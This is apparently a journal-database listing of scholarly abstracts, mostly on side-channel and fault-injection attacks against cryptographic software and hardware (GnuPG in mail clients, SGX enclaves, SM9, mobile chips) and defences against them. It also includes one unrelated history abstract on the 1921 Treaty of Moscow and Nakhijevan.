scholarly journals On the Security of Practical Mail User Agents against Cache Side-Channel Attacks

2020 ◽  
Vol 10 (11) ◽  
pp. 3770
Author(s):  
Hodong Kim ◽  
Hyundo Yoon ◽  
Youngjoo Shin ◽  
Junbeom Hur
Keyword(s):  
Third Party ◽  
Side Channel ◽  
Software Components ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
User Agent ◽  
Root Cause ◽  
Private Key ◽  
The Third ◽  
And Control

Mail user agent (MUA) programs provide an integrated interface for email services. Many MUAs support email encryption functionality to ensure the confidentiality of emails. In practice, they encrypt the content of an email using email encryption standards such as OpenPGP or S/MIME, mostly implemented using GnuPG. Despite their widespread deployment, there has been insufficient research on their software structure and the security dependencies among the software components of MUA programs. In order to understand the security implications of the structures and analyze any possible vulnerabilities of MUA programs, we investigated a number of MUAs that support email encryption. As a result, we found severe vulnerabilities in a number of MUAs that allow cache side-channel attacks in virtualized desktop environments. Our analysis reveals that the root cause originates from the lack of verification and control over the third-party cryptographic libraries that they adopt. In order to demonstrate this, we implemented a cache side-channel attack on RSA in GnuPG and then conducted an evaluation of the vulnerability of 13 MUAs that support email encryption in Ubuntu 14.04, 16.04 and 18.04. Based on our experiment, we found that 10 of these MUA programs (representing approximately 77% of existing MUA programs) allow the installation of a vulnerable version of GnuPG, even when the latest version of GnuPG, which is secure against most cache side-channel attacks, is in use. In order to substantiate the importance of the vulnerability we discovered, we conducted a FLUSH+RELOAD attack on these MUA programs and demonstrated that the attack restored 92% of the bits of the 2048-bit RSA private key when the recipients read a single encrypted email.

scholarly journals ThermalAttackNet: Are CNNs Making It Easy to Perform Temperature Side-Channel Attack in Mobile Edge Devices?

2021 ◽  
Vol 13 (6) ◽  
pp. 146
Author(s):  
Somdip Dey ◽  
Amit Kumar Singh ◽  
Klaus McDonald-Maier
Keyword(s):  
Information Flow ◽  
Heat Dissipation ◽  
Side Channel ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
Information Flow Control ◽  
On Chip ◽  
Temperature Side ◽  
Over Time ◽  
Memory Efficient

Side-channel attacks remain a challenge to information flow control and security in mobile edge devices till this date. One such important security flaw could be exploited through temperature side-channel attacks, where heat dissipation and propagation from the processing cores are observed over time in order to deduce security flaws. In this paper, we study how computer vision-based convolutional neural networks (CNNs) could be used to exploit temperature (thermal) side-channel attack on different Linux governors in mobile edge device utilizing multi-processor system-on-chip (MPSoC). We also designed a power- and memory-efficient CNN model that is capable of performing thermal side-channel attack on the MPSoC and can be used by industry practitioners and academics as a benchmark to design methodologies to secure against such an attack in MPSoC.

Adaptive multilevel fuzzy-based authentication framework to mitigate Cache side channel attack in cloud computing

2018 ◽  
Vol 09 (05) ◽  
pp. 1850045 ◽  
Author(s):  
Bharati Ainapure ◽  
Deven Shah ◽  
A. Ananda Rao
Keyword(s):  
Cloud Computing ◽  
Private Information ◽  
Privacy Preservation ◽  
Virtual Machines ◽  
Fuzzy Rule ◽  
Data Access ◽  
Side Channel ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
Cloud Providers

Cloud computing supports multitenancy to satisfy the users’ demands for accessing resources and simultaneously it increases revenue for cloud providers. Cloud providers adapt multitenancy by virtualizing the resources, like CPU, network interfaces, peripherals, hard drives and memory using hypervisor to fulfill the demand. In a virtualized environment, many virtual machines (VMs) can run on the same core with the help of the hypervisor by sharing the resources. The VMs running on the same core are the target for the malicious or abnormal attacks like side channel attacks. Among various side channel attacks in cloud computing, cache-based side channel attack is one that leaks private information of the users based on the shared resources. Here, as the shared resource is the cache, a process can utilize the cache usage of another by cache contention. Cache sharing provides a way for the attackers to gain considerable information so that the key used for encryption can be inferred. Discovering this side channel attack is a challenging task. This requires identification of a feature that influences the attack. Even though there are various techniques available in the literature to mitigate such attacks, an effective solution to reduce the cache-based side channel attack is still an issue. Therefore, a novel fuzzy rule-based mechanism is integrated to detect the cache side channel attackers by monitoring the cache data access (CDA). The factor that determines the attack is CDA in a log file created by the framework during authorization. The proposed framework also utilizes certain security properties including ECC and hashing for the privacy preservation and the decision is made with the aid of a fuzzy logic system.

Optical Fault Injection Attacks against Cipher Chip

2014 ◽  
Vol 1044-1045 ◽  
pp. 1498-1502 ◽  
Author(s):  
Hong Sheng Wang ◽  
Dao Gang Ji ◽  
Yang Zhang ◽  
Kai Yan Chen ◽  
Kai Song
Keyword(s):  
Fault Injection ◽  
Side Channel ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
Secret Information ◽  
Injection Attacks ◽  
Cryptographic Algorithms ◽  
Fault Injection Attacks

Cipher chips, such as microprocessors, are playing the important role in most cryptosystems, and implementing many public cryptographic algorithms. However, Side channel attacks pose serious threats to Cipher chips. Optical Side channel attack is a new kind of method against cipher chips. Two methods are presented in this paper, which shows how to implement optical fault injection attacks against RSA and AES algorithms running on AT89C52 microchip, and demonstrates how to exploit secret information under attack.

scholarly journals ThermalAttackNet: Are CNNs Making It Easy To Perform Temperature Side-Channel Attack In Mobile Edge Devices?

2020 ◽  
Author(s):  
Somdip Dey ◽  
Amit Kumar ◽  
Klaus D. Mcdonald-Maier
Keyword(s):  
Information Flow ◽  
Heat Dissipation ◽  
Side Channel ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
Information Flow Control ◽  
On Chip ◽  
Temperature Side ◽  
Over Time ◽  
Memory Efficient

<div><div><div><p>Side-channel attacks remain a challenge to information flow control and security in mobile edge devices till this date. One such important security flaw could be exploited through temperature side-channel attacks, where heat dissipation and propagation from the processing cores are observed over time in order to deduce security flaws. In this brief, we study how computer vision based convolutional neural networks (CNNs) could be used to exploit temperature (thermal) side-channel attack on different Linux governors in mobile edge device utilizing multi- processor system-on-chip (MPSoC). We also designed a power- and memory-efficient CNN model that is capable of performing thermal side-channel attack on the MPSoC and can be used by industry practitioners and academics as a benchmark to design methodologies to secure against such an attack in MPSoC.</p></div></div></div>

scholarly journals Side-Channel Attacks and Countermeasures for Identity-Based Cryptographic Algorithm SM9

2018 ◽  
Vol 2018 ◽  
pp. 1-14 ◽  
Author(s):  
Qi Zhang ◽  
An Wang ◽  
Yongchuan Niu ◽  
Ning Shang ◽  
Rixin Xu ◽  
...  
Keyword(s):  
Main Part ◽  
Digital Certificate ◽  
Side Channel ◽  
Cyber Physical System ◽  
Secret Key ◽  
Side Channel Attacks ◽  
Fault Attack ◽  
Private Key ◽  
Cryptographic Algorithm ◽  
Identity Based

Identity-based cryptographic algorithm SM9, which has become the main part of the ISO/IEC 14888-3/AMD1 standard in November 2017, employs the identities of users to generate public-private key pairs. Without the support of digital certificate, it has been applied for cloud computing, cyber-physical system, Internet of Things, and so on. In this paper, the implementation of SM9 algorithm and its Simple Power Attack (SPA) are discussed. Then, we present template attack and fault attack on SPA-resistant SM9. Our experiments have proved that if attackers try the template attack on an 8-bit microcontrol unit, the secret key can be revealed by enabling the device to execute one time. Fault attack even allows the attackers to obtain the 256-bit key of SM9 by performing the algorithm twice and analyzing the two different results. Accordingly, some countermeasures to resist the three kinds of attacks above are given.

scholarly journals Bluethunder: A 2-level Directional Predictor Based Side-Channel Attack against SGX

2019 ◽  
pp. 321-347
Author(s):  
Tianlin Huo ◽  
Xiaoni Meng ◽  
Wenhao Wang ◽  
Chunliang Hao ◽  
Pei Zhao ◽  
...  
Keyword(s):  
Branch Prediction ◽  
Control Flow ◽  
Side Channel ◽  
Side Channel Attack ◽  
Fine Grained ◽  
Private Key ◽  
High Bandwidth ◽  
Execution Environment ◽  
The Cost ◽  
Trusted Execution Environment

Software Guard Extension (SGX) is a hardware-based trusted execution environment (TEE) implemented in recent Intel commodity processors. By isolating the memory of security-critical applications from untrusted software, this mechanism provides users with a strongly shielded environment called enclave for executing programs safely. However, recent studies have demonstrated that SGX enclaves are vulnerable to side-channel attacks. In order to deal with these attacks, several protection techniques have been studied and utilized.In this paper, we explore a new pattern history table (PHT) based side-channel attack against SGX named Bluethunder, which can bypass existing protection techniques and reveal the secret information inside an enclave. Comparing to existing PHT-based attacks (such as Branchscope [ERAG+18]), Bluethunder abuses the 2-level directional predictor in the branch prediction unit, on top of which we develop an exploitation methodology to disclose the input-dependent control flow in an enclave. Since the cost of training the 2-level predictor is pretty low, Bluethunder can achieve a high bandwidth during the attack. We evaluate our attacks on two case studies: extracting the format string information in the vfprintf function in the Intel SGX SDK and attacking the implementation of RSA decryption algorithm in mbed TLS. Both attacks show that Bluethunder can recover fine-grained information inside an enclave with low training overhead, which outperforms the latest PHT-based side channel attack (Branchscope) by 52×. Specifically, in the second attack, Bluethunder can recover the RSA private key with 96.76% accuracy in a single run.

НАХИЧЕВАНСКАЯ ОБЛАСТЬ В КОНТЕКСТЕ МОСКОВСКОГО ДОГОВОРА И РУССКО–ТУРЕЦКО АЗЕРБАЙДЖАНСКИХ ОТНОШЕНИЙ 1920-1921 ГГ.

2021 ◽  
pp. 9-36
Author(s):  
Gayane Makhmourian
Keyword(s):  
International Law ◽  
Third Party ◽  
The Third ◽  
The Future ◽  
Red Army ◽  
Fatal Course ◽  
The Third Party ◽  
The Republic ◽  
Soviet Russia ◽  
And Control

NAKHIJEVAN REGION IN THE CONTEXT OF THE TREATY OF MOSCOW AND OF THE RUSSIAN–TURKISH–AZERBAIJANIAN RELATIONS IN 1920-1921 As it was necessary for the Kemalist Turkey to abolish the results of the Treaty of Sèvres, it came to an understanding with the Soviet Russia and gained assistance of its Red Army. Thus, the Turkish detachments returned into Nakhijevan on July 28, 1920, though they were driven out of it earlier by the forces of the Republic of Armenia. The latter one agreed to consider this district a "contestable" territory and adopted the deployment of the Bolshevik Army in it. Taking into account the fatal course of the Turkish-Armenian War of 1920, the official Yerevan did not reject on October 28 the future referendum in Nakhijevan; and the RSFSR accepted the unshakeable right of Armenia in regard to this district. However, the Alexandropol Treaty was signed on December 2, and the Republic of Armenia referred a conduct of referendum and control over the whole area to the Turkish Army. This Treaty deprived Armenia of the sovereign rights regarding Nakhijevan. Subsequent stubbornness of Turkey, together with its contribution to the Sovietization of Azerbaijan, produced the Treaty of Moscow, signed on March 16/18, 1921. This transaction grossly violated the international law and without participance of the third party – independent, though sovietized but mutinous Armenia, had transferred trusteeship over Nakhijevan to Azerbaijan. On October 13, 1921, Armenia got a tiny territorial cession, sanctioned the Treaty of Kars and recognized the new status of Nakhijevan.

The Hardware Implementation of a Lightweight Block Cipher Algorithm and a Message Authentication Algorithm

2012 ◽  
Vol 546-547 ◽  
pp. 1489-1494
Author(s):  
Yi Kun Hu ◽  
Zun Yang Qin
Keyword(s):  
Hardware Implementation ◽  
Block Cipher ◽  
Side Channel ◽  
Message Authentication ◽  
Side Channel Attack ◽  
Side Channel Attacks ◽  
Processing Efficiency ◽  
New Family ◽  
Lightweight Block Cipher ◽  
Lightweight Cipher

Among the block cipher algorithms, AES or DES is an excellent and preferred choice for most block cipher applications. But AES and DES are not very suitable for hardware implementation because of the high cost that they require large areas of routing and the processing efficiency is low, relatively. So lightweight cipher algorithms come into beings, among which PRESENT is very competitive. Along with the structure of a message authentication algorithm ALRED, a new family of Tunable Lightweight MAC based on PRESENT is proposed, that is TuLP. However, PRESENT is not able to resist side channel attack, so is TuLP, of course. For the above reason, in this paper, we provide an improvement of PRESENT by inserting random dummy cycles as well as shuffling to strengthen the security of PRESENT against side channel attacks. We will implement PRESENT and TuLP in Verilog and do simulation on Xilinx ISim platform. At last, we would like to provide the power analyzing of Xilinx XPower.

scholarly journals Private Function Evaluation Using Intel’s SGX

2020 ◽  
Vol 2020 ◽  
pp. 1-10
Author(s):  
Omar Abou Selo ◽  
Maan Haj Rachid ◽  
Abdullatif Shikfa ◽  
Yongge Wang ◽  
Qutaibah Malluhi
Keyword(s):  
Homomorphic Encryption ◽  
The Other ◽  
Third Party ◽  
Function Evaluation ◽  
Side Channel ◽  
Side Channel Attacks ◽  
Practical Solution ◽  
Running Time ◽  
First Case ◽  
Private Data

Private Function Evaluation (PFE) is the problem of evaluating one party’s private data using a private function owned by another party. Existing solutions for PFE are based on universal circuits evaluated in secure multiparty computations or on hiding the circuit’s topology and the gate’s functionality through additive homomorphic encryption. These solutions, however, are not efficient enough for practical use; hence there is a need for more efficient techniques. This work looks at utilizing the Intel Software Guard Extensions platform (SGX) to provide a more practical solution for PFE where the privacy of the data and the function are both preserved. Notably, our solution carefully avoids the pitfalls of side-channel attacks on SGX. We present solutions for two different scenarios: the first is when the function’s owner has an SGX-enabled device and the other is when a third party (or one of the data owners) has the SGX capability. Our results show a clear expected advantage in terms of running time for the first case over the second. Investigating the slowdown in the second case leads to the garbling time which constitutes more than 60% of the consumed time. Both solutions clearly outperform FairplayPF in our tests.

Sign in / Sign up

Export Citation Format

Share Document